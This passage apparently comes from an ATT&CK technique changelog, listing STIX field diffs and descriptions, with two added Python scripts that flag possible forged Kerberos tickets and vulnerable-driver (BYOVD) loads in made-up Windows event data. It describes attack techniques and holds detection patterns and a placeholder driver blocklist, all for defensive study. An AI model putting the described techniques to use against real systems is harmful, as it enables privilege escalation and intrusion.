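KNOWN_NETBIOS_DOMAINS = {"CORP", "NT AUTHORITY", "WORKGROUP"}  # hypothetical
EXPECTED_TICKET_ETYPES = {"0x11", "0x12"}  # AES128 / AES256; RC4 (0x17) is the outlier

# Constructed Windows Security events. Field names follow the 4624 / 4769 event
# schema; values are made up for illustration.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "jdoe", "TargetDomainName": "CORP",
     "LogonType": 3, "IpAddress": "10.0.0.15"},
    {"EventID": 4624, "TargetUserName": "svc_backup", "TargetDomainName": "corp.example.com",
     "LogonType": 3, "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": "",
     "LogonType": 3, "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "TargetUserName": "SYSTEM", "TargetDomainName": "NT AUTHORITY",
     "LogonType": 5, "IpAddress": "-"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE.COM", "ServiceName": "cifs/fs01",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
    {"EventID": 4769, "TargetUserName": "svc_backup@CORP.EXAMPLE.COM", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
]


def domain_field_anomaly(event):
    """Network logon (4624, type 3) whose Account Domain is blank or not a NetBIOS name.

    A ticket issued by the KDC yields the short domain name here; forged tickets have
    been observed leaving the field blank or carrying the FQDN instead.
    """
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return None
    dom = event.get("TargetDomainName", "")
    if dom == "":
        return "account-domain-blank"
    if "." in dom or dom.upper() not in KNOWN_NETBIOS_DOMAINS:
        return "account-domain-not-netbios"
    return None


def weak_etype_anomaly(event):
    """Service ticket (4769) issued with an encryption type the domain should not use."""
    if event.get("EventID") != 4769:
        return None
    etype = event.get("TicketEncryptionType")
    if etype not in EXPECTED_TICKET_ETYPES:
        return f"ticket-etype-{etype}"
    return None


def correlate(events):
    """Group anomalies by source IP so one host producing several signals stands out."""
    by_host = defaultdict(list)
    for ev in events:
        for check in (domain_field_anomaly, weak_etype_anomaly):
            reason = check(ev)
            if reason:
                by_host[ev.get("IpAddress", "-")].append(
                    (ev["EventID"], ev.get("TargetUserName"), reason))
    return dict(by_host)


if __name__ == "__main__":
    for host, hits in sorted(correlate(SAMPLE_EVENTS).items()):
        print(f"{host}: {len(hits)} anomalies")
        for eid, user, reason in hits:
            print(f"   {eid} {user}: {reason}")
```

Neither check is proof of MS14-068 on its own: RC4 tickets are normal in domains that have not yet moved accounts to AES, and some third-party clients populate the domain field inconsistently. The value is in the correlation, a single source host showing both signals around the same time, which is why findings are keyed by IP rather than emitted per event.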
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Application Log: Application Log Content', 'User Account: User Account Authentication', 'Process: Process Creation'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 18:51:01.070000+00:00 | 2022-04-28 16:06:49.447000+00:00 |
| external_references[1]['source_name'] | Technet MS14-068 | ADSecurity Detecting Forged Tickets |
| external_references[1]['description'] | Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015. | Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/library/security/ms14-068.aspx | https://adsecurity.org/?p=1515 |
| external_references[2]['source_name'] | ADSecurity Detecting Forged Tickets | Technet MS14-068 |
| external_references[2]['description'] | Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015. | Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015. |
| external_references[2]['url'] | https://adsecurity.org/?p=1515 | https://technet.microsoft.com/en-us/library/security/ms14-068.aspx |
| x_mitre_version | 1.1 | 1.4 |
| Description |
|---|
| Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them. Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Process: Process Creation', 'Application Log: Application Log Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 20:00:46.900000+00:00 | 2022-04-28 16:10:16.632000+00:00 |
| x_mitre_version | 1.1 | 1.3 |
| Description |
|---|
| Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570). |
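For the BYOVD case in the description, a valid signature is expected rather than suspicious, so the practical check is whether the loaded driver is on a known-vulnerable list and where it was loaded from. The Python below is an added example, not part of the ATT&CK record or of Microsoft's driver block rules, that triages constructed Sysmon Event ID 6 (DriverLoad) records against a blocklist. The blocklist hashes and driver names are placeholders, and the trusted load paths are an assumption about a default Windows layout.

```python
# Constructed blocklist in the spirit of the Microsoft recommended driver block rules
# cited above. Hashes and file names here are placeholders, not real entries.
BLOCKED_SHA256 = {
    "1" * 64: "vulndrv.sys (hypothetical vulnerable driver)",
}
BLOCKED_FILENAMES = {"vulndrv.sys", "oldbiosflash.sys"}  # hypothetical names

# Assumption: drivers on a default install load from these directories (lower-cased).
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers",
    "c:\\windows\\system32\\driverstore",
)

# Constructed Sysmon Event ID 6 records. Field names follow Sysmon's DriverLoad
# schema; paths, hashes and signer names are made up.
SAMPLE_DRIVER_LOADS = [
    {"ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
     "Hashes": "SHA256=" + "a" * 64 + ",MD5=" + "a" * 32,
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"ImageLoaded": "C:\\Users\\Public\\vulndrv.sys",
     "Hashes": "SHA256=" + "1" * 64 + ",MD5=" + "1" * 32,
     "Signed": "true", "Signature": "Some Hardware Vendor", "SignatureStatus": "Valid"},
    {"ImageLoaded": "C:\\Windows\\Temp\\helper.sys",
     "Hashes": "SHA256=" + "2" * 64,
     "Signed": "true", "Signature": "Expired Vendor Cert", "SignatureStatus": "Expired"},
]


def parse_hashes(field: str) -> dict:
    """'SHA256=...,MD5=...' -> {'SHA256': '...', 'MD5': '...'} with lower-cased values."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            algo, val = part.split("=", 1)
            out[algo.strip().upper()] = val.strip().lower()
    return out


def assess_driver_load(event: dict) -> list:
    """Return the reasons a driver load deserves attention; empty list means clean."""
    path = event.get("ImageLoaded", "")
    name = path.rsplit("\\", 1)[-1].lower()
    sha256 = parse_hashes(event.get("Hashes", "")).get("SHA256")
    reasons = []
    if sha256 in BLOCKED_SHA256:
        reasons.append(f"blocklisted-hash:{BLOCKED_SHA256[sha256]}")
    if name in BLOCKED_FILENAMES:
        # Name match is weaker than hash match (trivially renamed) but catches list gaps.
        reasons.append("blocklisted-filename")
    if not path.lower().startswith(TRUSTED_DRIVER_DIRS):
        # A signed driver dropped into a user or temp directory is the BYOVD pattern.
        reasons.append("untrusted-load-path")
    status = event.get("SignatureStatus", "unknown").lower()
    if status != "valid":
        reasons.append(f"signature-{status}")
    return reasons


def triage(events):
    """(path, reasons) for every driver load that raised at least one reason."""
    results = []
    for ev in events:
        reasons = assess_driver_load(ev)
        if reasons:
            results.append((ev["ImageLoaded"], reasons))
    return results


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_DRIVER_LOADS):
        print(path, "->", ", ".join(reasons))
```

Detection after the fact is the fallback; the block list referenced in the record ships as a WDAC policy, and enforcing it prevents the vulnerable driver from loading in the first place. Note that a clean signature status does not clear a driver here, which is the point: BYOVD abuses drivers whose signatures are genuinely valid.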
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 16:13:34.896000+00:00 | 2022-06-16 19:25:12.835000+00:00 |
| external_references[2]['source_name'] | Unit42 AcidBox June 2020 | Microsoft Driver Block Rules |
| external_references[2]['description'] | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. | Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021. |
| external_references[2]['url'] | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ | https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules |
| external_references[3]['source_name'] | Microsoft Driver Block Rules | Unit42 AcidBox June 2020 |
| external_references[3]['description'] | Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021. | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ |
| x_mitre_version | 1.3 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | David Tayouri | |
| x_mitre_data_sources | Process: Process Creation | |
| Old Description | New Description |
|---|---|
| Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 20:23:01.478000+00:00 | 2022-02-24 15:06:46.006000+00:00 |
| description | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. |
| x_mitre_detection | Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system. | Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system. |
| Old Description | New Description |
|---|---|
| An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) | An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.745000+00:00 | 2022-03-25 19:34:37.539000+00:00 |
| description | An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) | An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) |
| x_mitre_data_sources[0] | File: File Modification | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Application Log: Application Log Content | File: File Modification |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017. | |
| external_references | CAPEC-555 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-555 | |
| external_references | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-19 16:57:27.209000+00:00 | 2022-06-16 19:15:22.221000+00:00 |
| external_references[1]['source_name'] | capec | Volexity Virtual Private Keylogging |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/555.html | https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ |
| external_references[3]['source_name'] | Volexity Virtual Private Keylogging | Unit 42 Hildegard Malware |
| external_references[3]['description'] | Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| external_references[3]['url'] | https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ |
| external_references[5]['source_name'] | Unit 42 Hildegard Malware | capec |
| external_references[5]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://capec.mitre.org/data/definitions/555.html |
| x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content |
| x_mitre_version | 2.3 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | David Tayouri | |
| x_mitre_data_sources | Network Traffic: Network Connection Creation | |
| x_mitre_data_sources | Network Traffic: Network Traffic Content | |
| Old Description | New Description |
|---|---|
| Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools) | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 21:34:16.209000+00:00 | 2022-04-16 18:25:43.231000+00:00 |
| description | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools) | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS. |
| external_references[1]['source_name'] | Trend Micro APT Attack Tools | Microsoft SDelete July 2016 |
| external_references[1]['description'] | Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015. | Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018. |
| external_references[1]['url'] | http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/ | https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete |
| x_mitre_data_sources[0] | File: File Deletion | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Deletion |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Austin Clark, @c2defense'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016. | |
| external_references | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | |
| external_references | CAPEC-127 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
| external_references | CAPEC-127 | |
| external_references | CAPEC-497 | |
| external_references | Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-23 20:44:32.048000+00:00 | 2022-09-06 21:55:41.262000+00:00 |
| description | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device 